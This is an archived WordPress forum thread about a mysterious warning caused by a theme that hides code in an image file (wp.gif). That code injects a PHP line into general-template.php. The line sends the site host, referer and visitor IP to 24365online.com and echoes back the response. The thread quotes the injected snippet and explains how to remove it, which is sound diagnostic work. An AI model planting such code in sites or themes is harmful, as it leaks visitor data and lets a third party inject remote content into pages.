The MU forums have moved to WordPress.org

Anyone know what http://24365online.com is? (6 posts)

  1. stealthfiction
    Member
    Posted 10 years ago #

    On my test site today this warning popped up:

    "Warning: file_get_contents(http://24365online.com/_YTG_yu/_dl/get_info.php?host=firstpoll.com&referer=http:^^firstpoll.com^tags^&visitor_ip=67.98.158.3) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 403 Forbidden in /home/firstpol/public_html/wp-includes/general-template.php on line 61"

    I searched google and got pages of pages of people who had this error, but could not seem to find out what I had installed that triggered it, or how to fix it. It is now on every blog in the test site, regardless of the theme or plugins activated for those blogs.

  2. tmoorewp
    Member
    Posted 10 years ago #

    Looks like a problem on the server hosting 24365online.com. I get either a blank page or a 403 Forbidden error when visiting that site.

  3. stealthfiction
    Member
    Posted 10 years ago #

    Sorry if I wasn't clear. That error pops up in my site, and I don't know how it got there, why it's trying to access that website, or how to get rid of it.

  4. stealthfiction
    Member
    Posted 10 years ago #

    If anyone else runs into this in the future I found a helpful post at: http://blog.huilaaja.net/2009/11/08/hirewordpressexperts-com/

    Warning: URL file-access is disabled in the server configuration
    After installing one of the HireWordPressExperts.com theme, I got warning on my frontpage that it’s not safe to load scripts file_get_contents() from http://24365online.com/_YTG_yu/_dl/get_info.php?…

    Warning directed me to look script from general-template.php file and I found suspicious script:

    /*** HWEDLC ***/

    $url = “http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_ip=$visitor_ip”;
    $content = file_get_contents($url);
    echo $content;
    After removing the script and refresing browser warning was gone, but second refresh brought back the same warning

    I was sure this warning is caused some of the new theme files, so I tried to search similar content from inside of these files. Unfortonately Windows isn’t indexing php files, but lucily Visual Studio was able to find file. Surprisingly string was found from image file wp.gif. Soon I discovered that functions.php file tried to include wp.gif file into source code. Wp.gif file was adding additional code into get_footer function.

    In the end solution was quite simple:

    Remove wp.gif file
    Remove include or require command from functions.php
    Clean the get_footer function from wp-includes/general-template.php file
    I’m still believe in that the script is just a advertice, but HireWordPressExperts.com could do example XSS vulnerability into your service or mess up the layout.

    Would you hire “experts” that are using this kind of marketing strategies?

  5. andrea_r
    Moderator
    Posted 10 years ago #

    Please note this bit:

    "After installing one of the HireWordPressExperts.com theme"

    I'd highly suggest people don't use their themes.

  6. winnerszoom
    Member
    Posted 10 years ago #

    Solution:

    Replace the general-template.php inside the includes folder with the original file that is present in the wordpress installation package.

About this Topic

  • Started 10 years ago by stealthfiction
  • Latest reply from winnerszoom